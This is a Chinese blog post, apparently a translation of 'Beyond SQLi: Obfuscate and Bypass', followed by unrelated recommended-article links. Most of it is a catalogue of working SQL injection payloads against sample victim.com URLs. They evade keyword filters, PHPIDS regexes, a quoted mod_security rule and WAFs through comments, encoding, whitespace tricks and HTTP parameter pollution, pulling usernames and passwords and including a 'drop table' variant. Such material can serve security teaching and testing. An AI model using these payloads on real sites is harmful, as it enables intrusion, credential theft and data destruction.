jjf012
jjf012

Beyond SQLi: Obfuscate and Bypass简译

英文原文

绕过函数和关键字过滤

  1. and, or
Filtered injection:    1 or 1 = 1      1 and 1 = 1
Bypassed injection:    1 || 1 = 1      1 && 1 = 1
  1. and, or, union
    PHP filter code: preg_match('/(and|or|union)/i', $id)
    union查询经常用来爆数据,被和谐了之后只能通过布尔方式注入了
Filtered injection: union select user, password from users
Bypassed injection:  1 || (select user from users where user_id = 1) = 'admin'
  1. and, or, union, where
    PHP filter code: preg_match('/(and|or|union|where)/i', $id)
    可以通过limit m,n定位是第几条数据
    其中m是指记录开始的index,从0开始,表示第一条记录,n是指从第m+1条开始,取n条。
Filtered injection:  1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection:  1 || (select user from users limit 1) = 'admin'
  1. and, or, union, where, limit
    PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id) 
`group by`故名思意就是分组,一个id一个组。
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  1. and, or, union, where, limit, group by
    PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
    GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。substr就是截取字符了。
    Beyond SQLi: Obfuscate and Bypass简译_第1张图片 
Filtered injection:  1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
  1. and, or, union, where, limit, group by, select
    过滤代码就省略了,跟上面相比多了个select
    into outfile导出结果到指定文件,前提是能够访问的到吧,而且都能这样了还不如直接getshell?
    而且没有了select之后,如果列名不在前面的查询语句的表中就没用了。
Filtered injection:    1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection:    1 || 1 = 1 into outfile 'result.txt'
Bypassed injection:    1 || substr(user,1,1) = 'a'
  1. and, or, union, where, limit, group by, select, 单引号
    多了个unhex(),16进制的匹配
Filtered injection:    1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection:    1 || user_id is not null
Bypassed injection:    1 || substr(user,1,1) = 0x61
Bypassed injection:    1 || substr(user,1,1) = unhex(61)
  1. and, or, union, where, limit, group by, select, ', hex
    CONV(N,from_base,to_base) 该函数返回值N从from_base到to_base进制转换的字符串。最小基数值是2,最大值为36。
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
  1. and, or, union, where, limit, group by, select, ', hex, substr
    lpad(str,len,padstr) 返回字符串str,左填充用字符串padstr填补到len字符长度。 如果str为大于len长,返回值被缩短至len个字符(即,不能超过 len 长)。
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
  1. and, or, union, where, limit, group by, select, ', hex, substr, 空白符
Filtered injection:    1 || lpad(user,7,1)
Bypassed injection:    1%0b||%0blpad(user,7,1)

绕过正则过滤

PHPIDS 通常会干掉包含了 = or ( or ' 后面跟着数字或字符的例如 1 or 1=1, 1 or '1', 1 or char(97). 然而,it can be bypassed using a statement that does not contain =, ( or ' symbols.
会被干掉的:

1 union select 1, table_name from information_schema.tables where table_name = 'users'
1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)

可以绕过的

1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

绕过waf

  • 注释符
    http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
  • 大小写
    http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
  • 关键字替换
    http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
    插入空白符
    http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
    ps,如果碰到url重写的话/**/是不能用的
    http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
    要换成%0b
    http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
  • 双重编码
    http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

mod_security

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"

绕过
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
我们看看发生了什么
mysql支持三种注释符 #、-- 、/**/,这里还用了%0D%0A进行换行
在waf看来,语句是这样的

            0 div 1 union#foo*/*/bar
            select#foo
            1,2,current_user

在数据库看来,语句是这样的0 div 1 union select 1,2,current_user

  • 缓冲区溢出
    http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141 414141414141 .)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
  • 内联注释(常见于过狗注入)
    http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
    http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

更高级的绕过方式

  • http参数污染(HTTP Parameter Pollution: Split and Join)
    http://victim.com/search.aspx?par1=val1&par1=val2
    简单的说,对于waf取得值是val1,而对于web服务器取得的值是val2,亦或者是val1,val2的组合

    Web Server Parameter Interpretation Example
    ASP.NET/IIS Concatenation by comma par1=val1,val2
    ASP/IIS Concatenation by comma par1=val1,val2
    PHP/Apache The last param is resulting par1=val2
    JSP/Tomcat The first param is resulting par1=val1
    Perl/Apache The first param is resulting par1=val1
    DBMan Concatenation by two tildes par1=val1~~val2

bypass mod_security

这个url妥妥的会被拦截
http://victim.com/search.aspx?q=select name,password from users
用上参数污染就绕过了
http://victim.com/search.aspx?q=select name&q=password from users
waf眼中是这样的

q=select name
q=password from users

iis眼中却是这样的q=select name,password from users

  • http参数污染2(HTTP Parameter Contamination)
    就是利用web服务器和waf对http请求的认知的差异来绕过waf。

RFC 2396定义了这样的东西
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `

Query String Apache/2.2.16, PHP/5.3.3 IIS6/ASP
?test[1=2 test_1=2 test[1=2
?test=% test=% test=
?test%00=1 test=1 test=1
?test=1%001 NULL test=1
?test+d=1+2 test_d=1 2 test d=1 2
Keywords WAF ASP/ASP.NET
sele%ct * fr%om.. sele%ct * fr%om.. select * from..
;dr%op ta%ble xxx ;dr%op ta%ble xxx ;drop table xxx

你可能感兴趣的:(Beyond SQLi: Obfuscate and Bypass简译)

  • 舜公郑金锋书辛丑自剪扇面书法作品(四O六) 舜公郑金锋
    辛丑小阳春,新自剪扇面400品,大多为各色撒金、撒银、描金、描银、水印、彩绘、荧光等亚粉、色宣纸,以及域外包装填充纸等;王一品长锋羊毫秃笔;一得阁云头艳墨、宿墨、水等。书体有甲骨文,金文(商周金文、春秋战国金文、中山王厝器金文、汉金文……),楚简帛书,侯马盟书,温县盟书,小篆,果蝙书等,隶书(秦简、汉简帛书、汉碑……),草书(章草、小草、大草……),行书(行楷、行草),楷书(魏碑及北朝墓志、隋朝墓
  • 《西游记》观后感 领读者李轩颖
    西游记相信大家都不陌生,但我还是要给有些人讲一讲。长话短说,当然了,开头就是孙悟空的讲解,孙悟空本为一块仙石,然而因风化作一石猴。猪八戒是天蓬元帅,后因调戏王母娘娘的孙女织女后被打入凡间,投胎为猪,后名猪八戒。沙和尚因常年居住在流沙河中千年未出,所以名为沙僧。唐僧原名唐三藏,后因被吴来佛祖西天取经简名为唐僧。师徒四人历经了九九八十一磨难,最终取到了西经。然而最后师傅唐僧让他们回去的时候,可四人都恋
  • 2021-01-09 哥伦比亚 《梦中的欢快葬礼和十二个异乡故事》 加西亚·马尔克斯 著 罗秀 译 juneyale
    《梦中的欢快葬礼和十二个异乡故事》哥伦比亚加西亚·马尔克斯著罗秀译序《总统先生,一路走好!》“再给我一杯咖啡。”他用纯正的法语说。随即补充道:“要意式咖啡,能让人起死回生的那种。”并没有意识到话里的双关含义。当火车开始加速,荷马突然发现总统的手杖还在自己手中,于是跑到站台尽头,把手杖用力扔过去,希望总统能在半空中接住。但是手杖掉在了铁轨上,随即被碾得粉碎。那真是恐怖的一瞬。拉萨拉看到的最后一幕是那
  • 【创客文案社】第三期写手招募 筱瑶123
    创客文案社第三期写手招募开始了。要求:1:注册一个月以上2:本身热爱写作3:有时间参与接单投稿参与方式:可以关注公众号:写作灵感;也可以通过其他转发文章的文友帮忙拉入群;也可以简信我。参与之后的文友,会先进入新人班,进行基本的试稿与培训,先接一些比较简单的单子;在这里可以一边赚钱,一边学习。不知不觉,来三四个月了,也发现了很多很有意思的现象。1:在上写一篇文章,基本都是几毛钱,多的也不过几块钱的收
  • 今夜的雨欠费了? 洛小简
    文/洛小简这里是醉人的宜宾,这是枫叶的十月。是不是得罪了龙王爷,让这雨肆无忌惮,却也毫无章法。那雨声暴躁,或早晨,或是午后,更多的在夜里。可今夜它睡着了,我看怕是欠费了,还未充值。但偏偏我醒了,醒在以往下雨的凌晨。耳边还有车声,最恨那乌鸦,又在远处偷鸣。就让龙王息怒吧,雨神也要歇一歇,持久的战斗体力无存,怎么给冬天一个雪的交待?那我的梦里还会不会下雪,是否如我所愿,这又是未解的谜题。幸好这雨也会欠
  • MyBatis 详解 阿贾克斯的黎明 javamybatis
    目录目录一、MyBatis是什么二、为什么使用MyBatis(一)灵活性高(二)性能优化(三)易于维护三、怎么用MyBatis(一)添加依赖(二)配置MyBatis(三)创建实体类和接口(四)使用MyBatis一、MyBatis是什么MyBatis是一个优秀的持久层框架,它支持自定义SQL、存储过程以及高级映射。MyBatis免除了几乎所有的JDBC代码以及设置参数和获取结果集的工作。它可以通过简
  • 《拖延心理学》(一)你为什么会拖延?|木盒笔记 纯se蓝调
    《拖延心理学》是帮助你向拖延症宣战的一本书,作者简·博克和莱诺拉·袁是全球知名的拖延症治疗专家。大概每个人或多或少总会有一点拖延症的行为。比如明天要叫论文了,今天你还没有写好,你一边在焦虑症怎么办,一边又拿着手机漫无目的的刷新闻;比如你想了很久准备减肥,但是迟迟又没有行动,想着今天晚上少吃一点吧、明天我就开始运动。今天分析的笔记来告诉你“你为什么会拖延?”,解读人杨坚。有人说拖延就像巨大的泥沼,让
  • 阅读卡片1 大麦茶的故事
    今天正式开始模仿一位简友的方法,写所见,所思。所见:“芒格是个真正的失败爱好者我觉得很多人都忽略了芒格是一个痴迷的失败爱好者。在和芒格交流的时候,他专门几次强调:我一生中,花费大量的时间研究人是如何失败的,我要弄明白那些无效的策略。”所思:这是在成甲老师的公众号的文章中复制的。曾经看过好多篇关于芒格老爷子的文章,一直不太能理解,有些话究竟是什么意思,今天这篇文章让我知道,大牛们也有暂时不能明白的时
  • 2024年华为杯数学建模研赛C题思路代码+论文助攻 DS数模 2024华为杯数学建模华为2024华为杯2024研究生数学建模2024研赛
    2024年华为杯研究生数学建模竞赛(以下简研赛)将于9月21日上午8时正式开始。下文包含:2024研赛思路解析、研赛参赛时间及规则信息说明、好用的数模技巧及如何备战数学建模竞赛C君将会第一时间发布选题建议、所有题目的思路解析、相关代码、参考文献、参考论文等多项资料,帮助大家取得好成绩。2024年研赛将于9月21日上午8时正式开始这里有些资料,大家可以看看:【2024最全国赛研赛数模资料包】C君珍贵
  • 简九月的第188天日更|二宝米乐发烧了 简九月
    昨天夜里,二宝开始发烧了,刚开始是37度多点,慢慢地长到38度。我喂了她点退烧药,好久才把烧退掉。一夜我又醒来好多次,看看她是否发烧。早上六点多再次起烧了,有给她喝了退烧药,烧退了后二宝睡着了。我一上午在学校担心的不得了,害怕她又起烧,还好一上午没有发烧。下午一直是38度以下,小青给她喝了好多水,烧也退了下来,可是,现在又起烧了……38.2度,喝了药之后,睡也睡不好,我就一直抱着,还没放下。这是二
  • 2020-03-24 艺鹰空间设计
    从欧美的复古奢华,到现代极简的北欧风,一个太沉闷,一个略单调,设计师梁博,在自己的作品中融入一点点的复古元素,即能保留现代风格的清爽和功能上的便利,又可以收获复古的奢华和优雅,简直是太完美的搭配!古典风格住宅,设计师重新设计,厨房和起居室结合在一起,走廊和厨房起居室之间的墙从地板到天花板变成了一个透明隔断,给空间带来了更多的空气和光线。主卧室的设计颇有高级酒店的味道,左侧设置了休闲椅,右侧则有办公
  • 不简单的简化之路 颜小婧
    简化16年前,畅销书作者理查德·科克向世人介绍了80/20法则,即我们80%的成就源于仅仅20%的时间、努力和关键决策。对于这个80/20法则,我相信大家都很熟悉了。而被称为80/20法则之父的的理查德·科克和格雷格·洛克伍德一起合作了一本《极简法则》,揭示了:简化是创造大规模市场、建立高盈利企业的秘密。通过对亚马逊、苹果、宜家、福特等成功的企业所采取的商业模式的分析得出两种简化策略:价格简化和命
  • 写作只是业余兴趣爱好,不为挣钱! 简明估
    在我写作这一年多里,有很多编辑找我写作有偿文章,我都拒绝了!其实我写文章,只是个人爱好,纯属娱乐,不为挣钱,更不为打赏,所以我只愿意在里面写写文章,图的是一个没有压力,开心,自在的生活!我觉得人世间的那份爱好,如果变成了挣钱的工具,那么就失去了原味了,每天强迫自己去日更新,影响身体健康,影响睡眠,一个快乐变成了压力,真的是得不偿失!人生难得自由在,荣华富贵莫强求,君子之才发与心,不与利益为目的!简
  • 真传一句话,假传万卷经 覃榜言
    真传一句话,假传万卷经。这句话说的是大道至简。传说古时候,有一个中东地区的王,让他的大臣们编写一本书,以教化他的子民。过了很长一段时间,他的大臣们呈上了一本很厚的书。王说,能不能压缩一点。又过一段时间,他的大臣们呈上了一本薄了很多的书,王又说,还是太厚。他的大臣们只好再删减,终于写成了一本很薄的小册子。但王还是不是满意。大臣们这下可为难了,只好群策群力,绞尽脑汁,写下了一句话。写好了给王看。王很满
  • 懒人油泼面,治愈一切 惠顾星辰
    图片发自App说起油泼面,自然会想到电视剧《白鹿原》里的一个场景,一个和主线剧情关系不大的小细节,这个细节的主角就是一碗热气腾腾的油泼面。剧情中,秦海璐下厨为张嘉译做油泼面,做面的过程应该是正宗的陕西古法,面宽油香,热油泼在面上的一刹那,随着“刺啦”的一声,香气仿佛冲破屏幕,萦绕在观众身旁,让观众们纷纷在弹幕中留下:“油泼面来了,流口水啊”、“看饿了想吃”等留言。一部《白鹿原》,连带着火了陕西油泼
  • Codeforces Round 969 (Div. 2) C. Dora and C++ (裴蜀定理) 致碑前繁花 刷题记录c语言c++开发语言
    什么?竟然是裴蜀定理。。。由于这里给出了a和b两个数,我们或许可以想到使用同样是需要给出两个定值的裴蜀定理,即:如果给定xxx和yyy,那么一定有ax+by=gcd(x,y)ax+by=gcd(x,y)ax+by=gcd(x,y)。所以在这时候我们就可以让输入的所有数都去对gcd(a,b)gcd(a,b)gcd(a,b)取模,这样就能够得到所有数的最简形式(可以当成是让所有数尽可能消去aaa和bb
  • 小说推荐!5W收藏/清冷禁欲《陆医生他想谈恋爱》+甜宠古言《迫嫁》 菜鸟不怕输
    《陆医生他想谈恋爱》by景戈文案陆淮予,颌面外科全国数一数二的专家,主攻颌面部缺损重建,多少人排队等他手术。某天查房结束,余光瞥见坐在候诊室低头玩手机的简卿。乖巧安静,像只倦懒的猫儿。心血来潮要亲自主刀——拔牙。手术灯架上挂起玩具猴子。护士提醒道:“陆医生,给小朋友看牙才挂这个。”陆淮予淡淡‘嗯’了一声,“她就是小朋友。”-简卿来医院拆线时,正巧撞上一个患者对陆淮予表白。陆医生表情淡漠,语调冰凉,
  • 《拖延心理学》:家长帮助孩子摆脱拖延症,要避免陷入相互挫败 曹木瓜
    楼下邻居家的大姐,一直为孩子烦恼,做事磨磨蹭蹭、拖拖拉拉,早晨上学要三催四请,收拾个书包要个把小时,晚上写作业常常熬到十一二点钟。为此大姐经常训斥孩子,孩子对此也很反感。做事拖延的孩子不在少数,有的是只在学习相关的事情上,有的是吃饭、洗澡方面……孩子成长的过程中,家庭中的价值观、态度、信念和期望都会潜移默化影响着孩子,孩子成为拖延者,与家庭有很大的关系。美国资深心理咨询师简·博克和莱诺拉·袁在其著
  • 当前最流行的架构设计模式 turingbooks
    《微服务设计(第2版)》最可贵的地方在于,不光具备理论性与系统性,更为注重实践性与可操作性。全书勾勒出一幅从宏观到细节,再到组织落地的微服务架构整体实施蓝图。无论是对关注微服务领域的工程师与架构师,还是对寻求架构升级的管理者与决策者来说,本书都可以作为指导手册。——沈剑,快狗打车CTO《微服务设计(第2版)》萨姆·纽曼|著钟健鑫张沙沙智伟|译软件开发大神MartinFowler如此推荐本书:“微服
  • 故事||致 爱上一个人 译垚
    有时候,一首不出名,也不算很好听的歌曲,歌词和对白,与身边的一些故事,是那么的相似,人生有多少的故事,疼痛溶在一首音乐里......原创文/译垚网图致谢原创者侵删故事||致爱上一个人痛苦不需要预演爱时,撕心裂肺有多傲娇和狠心把真心爱你的人,伤得彻底为爱一个人,思念决堤浪潮无情的淹没真心抓住最后一根稻草,为等待硬撑泪水是睡前那声晚安哭泣一直不肯入眠幻影,均在梦中迈出脚步才知远方没有终点爱被拒千里之外
  • 人,越朴素,越高贵 云飞扬_6315
    2020年12月21日星期二晴读书摘记——庄子说:“朴素而天下莫能与之争美。”朴素,是极致的美。譬如一枝白莲,清清净净立于水中,不染一丝纤尘,素雅而高贵,胜过万千姹紫嫣红。所以古人说:“淡极始知花更艳,花到无艳始称绝。”朴素,也是一种大道。历尽世间喧闹浮华,才明白细水长流的平凡生活的可贵;尝遍天下美食,才知晓人间最有味的,是清淡的欢愉。大道至简,三千繁华,终归朴素。越高贵的人,越朴素。心安茅屋稳,
  • 【网络安全 | 代码审计】JFinal之DenyAccessJsp绕过 秋说 网络安全web安全java代码审计漏洞挖掘
    未经许可,不得转载。文章目录前言代码审计推理绕过Tomcat解析JSP总结概念验证阐发前言JFinal是一个基于Java的轻量级MVC框架,用于快速构建Web应用程序。它的设计理念是追求极简、灵活、高效,旨在提高开发效率,减少冗余代码的编写,适合中小型项目以及对性能有较高要求的项目。在较新的JFinal版本中,默认情况下无法直接通过浏览器地址栏输入.jsp文件名来访问对应的JSP文件。也就是说,主
  • 夏至来了 李超越kelly
    夏至来了。今天,我们会拥有一年中最长的白日。如果幸运,还会见到一年中最璀璨的星空。明与暗的交替,汇聚成美,像生命,有甘,有苦,才立体真实。古人讲“大道至简,阴阳互生”,就是在提醒我们,万事都有两面。越是艰难,越要相信光明将至;越是绚烂,越要小心蛰伏。元代书法家赵孟頫曾写过一首很珍贵的小诗《夏至》:夏至午之半,一阴巳复生。坚冰亦驯至,顾岂一朝成。万物方茂悦,安知有彫零。君子感其微,恸笑几失声。意思是
  • 2021-01-05良安时空群分享 石竹
    一群李晓玉老师的分享主题:进良安时空听课数月有感:良安时空门敞开,有福有缘自进来。古圣先贤经典传,心学丶气学注里边。传统文化来弘扬。听师分享心亮堂。心灵修炼不可丢,精神匮乏太危险。明理懂法心窍开,修心养性体康健。行有不正需内求,做人真谛记心间。自我完善为最乐,正念丶正气得正果。淡淡喜悦气血通,行善积德病不生。爱的理念太神奇,诚心接受必受益。大道至简又无言,一切都在心念间。师传文化力有限,星星之火可
  • 『读书•觉察•冥想‖第二百九十天』《生命之书—365天的静心冥想》作者:[印度]克里希那穆提著 胡因梦译 景熙惟
    《生命之书-365天的静心冥想》十月十七日心智的更新我认为不断地努力想变成什么,便是脑子受损和退化的主因。你看我们老化的速度有多快,不但是那些六十岁以上的人,连年轻人都开始老化了。这里指的是心智上的退化。很少有人能够让心保持年轻,我指的年轻并不是有玩乐的兴致,而是一个不受染着的心——不被生活中的意外和事件所扭曲,不因为生活中的奋斗与挣扎而变得疲惫不堪。显然我们必须拥有一颗年轻的心,因为老旧的心已经
  • 一落索 小苇的花 松涛_5e7b
    图片小苇手机拍摄图片小苇手机摄影【一落索】小苇的花艳艳花开真好,流年不老。爱清风款款芳华,赏心处、轻吟啸。今日喜无烦恼,一舒怀抱。香香来嗅乐逍遥,悄记取、拈花笑。2019.5.23新结识的简友,拍下好漂亮的花,传给了我,小记附词谱又名洛阳春、玉连环、一络索等。双调46字,上下片各四句三仄韵。⊙⊙⊙⊙⊙,⊙□⊙。□⊙□□,⊙⊙、□□。⊙□⊙,⊙□⊙。⊙□⊙□□,⊙⊙、□□。(首句亦可作⊙□⊙□)
  • 莫名其妙 晋迪
    昨天的发文,在11点28分的时候被告知:很抱歉您的文章《XX》,已转为仅自己可见,请您查看《为什么文章会被锁定?》,参考相关内容规定,如您仍有疑问,您可以申诉,或者将您的文章链接发送邮件到[email protected],工作人员会在1/2个工作日内为您办理,感谢您的理解与支持!看到此消息,真的有种莫名其妙的感觉。前几天,曾经看到有简友说自己的文章被锁定,觉得这事离自己很远,没想到仅仅几天而已,这
  • 随笔 小柠Duo猫猫
    从第一位粉丝,到今天的第七位,我还是庆幸,还是?但还是很感谢你们的关注。我不知道你会看我的文章吗?看我的啰哩啰嗦吗?或许是我的一个点赞,你就回粉下,或许?说实话,我很少去关注,对于关注的简友会偶尔看下,会看看推送,会对产生共鸣的文章点下小爱心,简友们各个是高手,可以写出那么一长段,我可做不到!会因此说,我当初是学理的,不是学文的。呃,这个借口真的烂极了。依然感谢你们!
  • 用前端的语言写后端——Node.js之Express tabzzz 前端前端node.jsexpress
    ExpressExpress是一种流行的模型视图控制器(MVC)Node.js框架,具有快速、极简和灵活的优点,为Web和移动应用程序开发提供了强大的功能集合。最受欢迎的Node.js框架!文章目录Express安装ExpressHelloWorld路由中间件全局中间件应用中间件开放跨域请求几种常用的Express内置中间件函数1.JSON格式数据中间件函数2.静态文件中间件函数3.路由中间件函数
  • 【呓 语】约翰·穆勒:我们活一场,值得一点更高级的快乐 诗人琉璃姬
    选自约翰·穆勒《功利主义》第二章徐大建译上海人民出版社如果以为,那些赞成用功利来判别行为对错的人,是在一种狭隘的仅仅存在于口语中的意义上使用功利一词,将功利看作快乐的对立面,那真是太无知了。对于这种错误,只需提一下即可。要是误认为功利主义的哲学对手竟然也会产生如此荒唐的误解,哪怕是一时,也应该向他们表示道歉;这种误解之所以显得更不寻常,是因为对功利主义的另一种常见的批评恰好相反,指责功利主义把一切
  • mongodb3.03开启认证 21jhf mongodb
    下载了最新mongodb3.03版本,当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题,现总结如下: (百度上搜到的基本都是老版本的,看到db.addUser的就是,请忽略) Windows下我做了一个bat文件,用来启动mongodb,命令行如下: mongod --dbpath db\data --port 27017 --directoryperdb --logp
  • 【Spark103】Task not serializable bit1129 Serializable
    Task not serializable是Spark开发过程最令人头疼的问题之一,这里记录下出现这个问题的两个实例,一个是自己遇到的,另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在,至少目前阶段碰到此类问题,没有什么章法 1.   package spark.exampl
  • 你所熟知的 LRU(最近最少使用) dalan_123 java
    关于LRU这个名词在很多地方或听说,或使用,接下来看下lru缓存回收的实现 1、大体的想法     a、查询出最近最晚使用的项     b、给最近的使用的项做标记 通过使用链表就可以完成这两个操作,关于最近最少使用的项只需要返回链表的尾部;标记最近使用的项,只需要将该项移除并放置到头部,那么难点就出现 你如何能够快速在链表定位对应的该项? 这时候多
  • Javascript 跨域 周凡杨 JavaScriptjsonp跨域cross-domain
                                       
  • linux下安装apache服务器 g21121 apache
    安装apache 下载windows版本apache,下载地址:http://httpd.apache.org/download.cgi   1.windows下安装apache Windows下安装apache比较简单,注意选择路径和端口即可,这里就不再赘述了。 2.linux下安装apache: 下载之后上传到linux的相关目录,这里指定为/home/apach
  • FineReport的JS编辑框和URL地址栏语法简介 老A不折腾 finereportweb报表报表软件语法总结
      JS编辑框: 1.FineReport的js。 作为一款BS产品,browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。 大家知道,预览报表时,报表servlet会将cpt模板转为html,在这个html的head头部中会引入FineReport的js,这个finereport.js中包含了许多内置的fun
  • 根据STATUS信息对MySQL进行优化 墙头上一根草 status
    mysql  查看当前正在执行的操作,即正在执行的sql语句的方法为:      show processlist 命令   mysql> show global status;可以列出MySQL服务器运行各种状态值,我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
  • 我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
    本文介绍如何给Spring的Bean配置文件的Bean定义别名? 原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
  • 高性能mysql 之 性能剖析 annan211 性能mysqlmysql 性能剖析剖析
    1 定义性能优化 mysql服务器性能,此处定义为 响应时间。 在解释性能优化之前,先来消除一个误解,很多人认为,性能优化就是降低cpu的利用率或者减少对资源的使用。 这是一个陷阱。 资源时用来消耗并用来工作的,所以有时候消耗更多的资源能够加快查询速度,保持cpu忙绿,这是必要的。很多时候发现 编译进了新版本的InnoDB之后,cpu利用率上升的很厉害,这并不
  • 主外键和索引唯一性约束 百合不是茶 索引唯一性约束主外键约束联机删除
    目标;第一步;创建两张表 用户表和文章表         第二步;发表文章       1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
  • 线程的调度 bijian1013 java多线程thread线程的调度java多线程
    1.       Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。   2.       多数线程的调度是抢占式的(即我想中断程序运行就中断,不需要和将被中断的程序协商) a) 
  • 查看日志常用命令 bijian1013 linux命令unix
    一.日志查找方法,可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log   二.查看日志常用命令1.grep '关键字' error.log:在error.log中搜索'关键字'2.grep -C10 '关键字' error.log:显示关键字前后10行记录3.grep '关键字' error.l
  • 【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
    MyBatis这个系列的文章,主要参考《Java Persistence with MyBatis 3》。   样例数据 本文以MySQL数据库为例,建立一个STUDENTS表,插入两条数据,然后进行单表的增删改查     CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
  • 【Hadoop十五】Hadoop Counter bit1129 hadoop
       1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
  • 解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池 优化
    近段时间,公司的检测中心报表系统(SMC)的开发人员时不时找到我,说用户老是出现无法登录的情况。前些日子因为手头上 有Jboss集群的测试工作,发现用户不能登录时,都是在Tomcat中将这个项目Reload一下就好了,不过只是治标而已,因为大概几个小时之后又会 再次出现无法登录的情况。 今天上午,开发人员小毛又找到我,要我协助将这个问题根治一下,拖太久用户难保不投诉。 简单分析了一
  • java-75-二叉树两结点的最低共同父结点 bylijinnan java
    import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
  • 行业垂直搜索引擎网页抓取项目 carlwu LuceneNutchHeritrixSolr
    公司有一个搜索引擎项目,希望各路高人有空来帮忙指导,谢谢! 这是详细需求: (1) 通过提供的网站地址(大概100-200个网站),网页抓取程序能不断抓取网页和其它类型的文件(如Excel、PDF、Word、ppt及zip类型),并且程序能够根据事先提供的规则,过滤掉不相干的下载内容。 (2) 程序能够搜索这些抓取的内容,并能对这些抓取文件按照油田名进行分类,然后放到服务器不同的目录中。
  • [通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
          降低通讯服务资费,就意味着有更多的用户进入,就意味着通讯服务提供商要接待和服务更多的用户,在总体运维成本没有由于技术升级而大幅下降的情况下,这种降低资费的行为将导致每个用户的平均带宽不断下降,而享受到的服务质量也在下降,这对用户和服务商都是不利的。。。。。。。。     &nbs
  • Java时区转换及时间格式 Cwind java
    本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用,以及不同时区时间相互转化的方法和原理。   问题描述: 向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如,服务器位于东八区(北京时间,GMT+8:00),而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
  • readonly,只读,不可用 dashuaifu jsjspdisablereadOnlyreadOnly
    readOnly 和 readonly 不同,在做js开发时一定要注意函数大小写和jsp黄线的警告!!!我就经历过这么一件事: 使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能,有的就不行,而且函数readOnly有黄线警告!!!就这样被折磨了不短时间!!!(期间使用过disable函数,但是发现disable函数之后后台接收不到前台的的数据!!!)  
  • LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com jsWeb
    LABjs 的核心是 LAB(Loading and Blocking):Loading 指异步并行加载,Blocking 是指同步等待执行。LABjs 通过优雅的语法(script 和 wait)实现了这两大特性,核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器,倡导的是一种模块化开发理念,核心价值是让 JavaScript 的模块化开发变得更
